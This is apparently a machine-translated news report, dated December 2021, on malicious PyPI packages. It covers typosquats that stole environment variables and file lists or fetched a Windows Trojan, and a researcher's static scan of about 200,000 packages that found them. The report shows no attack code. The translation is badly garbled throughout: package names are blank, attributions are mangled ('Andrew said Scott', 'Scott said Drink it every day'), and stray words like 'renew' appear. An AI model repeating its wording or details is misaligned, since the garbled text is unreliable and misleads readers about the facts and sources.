Adam Bannister December 14, 2021 16:09 UTC
Update time: December 14, 2021 18:39 UTC
Two packages have not been found within 10 months
renew The Python Package Index (PyPI) has deleted malware deployment and data theft packages that have been collectively downloaded thousands of times.
These three malicious software packages deceive unsuspecting users by stealing the names of legitimate software packages.
‘good reputation’
In the case of two software packages that steal data from an infected system, the download volume may also be exaggerated because of how the author deceptively increased its credibility.
“Both packages include their source code URL as an existing popular library, so anyone browsing the package or analyzing the popularity of the library in PyPI will see a large number of GitHub stars and branches-indicating a good reputation,” Andrew said Scott, Palo Alto’s product manager and maintainer of the Python security project Ochrona Security, in the media Blog post.
Uploaded by the same user, these two packages-” and”-seem to be for Apache Mesos users who are used to manage computer clusters.
Catch up with the latest software supply chain attack news
They were uploaded to PyPI in February 2021 and have since been downloaded more than 10,000 times, including more than 600 downloads in the last month alone.
Scott notified them on the same day on December 13th, thanking the Python security team for promptly removing these packages.
The third Trojan horse smuggling package called “” was downloaded approximately 600 times between its appearance on PyPI on December 1 and its deletion on December 10 when the PyPI administrator received an alert.
“I believe the purpose of aws-login0tool is to confuse users of a tool called aws-login-tool, which no longer exists on PyPI, but exists on some older mirrors,” Scott said Drink it every day.
“The dpp-client package I must assume may be [intended to imitate] Some internal components of a data processing pipeline tool, but I can’t confirm. “
Malicious operation
Scott said that all three packages were identified as potential malware by importing strings, “because this is usually used to steal data or download malicious files.”
Data theft is obviously looking for files related to Apache Mesos for collecting environment variables and file lists and forwarding them to “unknown web services”.
Before “getting the file from a non-descriptive domain” and attempting to execute the file (a known Windows Trojan), it performed a standard package installation.
“It’s hard to know what effect these will have,” Scott said. “The Trojan horse package is limited to malware functions. Data extraction will really depend on your environment-but I can definitely see that it can collect things like AWS credentials and other API keys. I’m not sure about the target directory What Mesos-specific information is stored.”
Python detection
These findings came from a static analysis of approximately 200,000 PyPI packages-close to two-thirds of the total-after downloading them using Bandersnatch.
He extracted the package by creating “a very simple Python script to recursively iterate Bandersnatch’s somewhat complicated folder structure, then unzip and extract each sdist, egg or wheel into a flat directory.
“After the extraction, I ran many string and regular expression searches using grep, and then manually viewed the results,” Scott said.
The technology also discovered a small vulnerability in an open source package developed by a commercial vendor.
Scott says SafetyIt is an open source software portfolio analysis tool that can help developers if they are using mirroring or want to determine whether a package exists in their project.
He also intends to update and refine his package analysis, and will post other findings later.
This article was updated on December 14 based on Andrew Scott’s additional comments
Don’t forget to read The “Log4Shell” vulnerability poses a serious threat to applications that use the “ubiquitous” Java logging package Apache Log4j
